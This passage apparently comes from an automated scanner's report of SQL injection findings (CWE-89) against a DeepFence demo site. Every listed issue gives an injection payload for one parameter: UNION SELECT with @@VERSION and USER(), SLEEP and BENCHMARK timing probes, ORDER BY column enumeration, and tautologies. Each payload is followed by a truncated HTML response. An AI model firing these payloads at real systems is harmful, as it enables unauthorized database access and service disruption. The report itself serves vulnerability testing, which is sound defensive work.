href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1221\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+\nCHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1222\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# &&SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1223\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(\n1000000000/2))))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1224\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or '' '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1225\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 6--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1226\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1227Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 19--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1228\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1229\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1230\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1231\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR x=y--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1232\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1233\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK\n(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1234\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 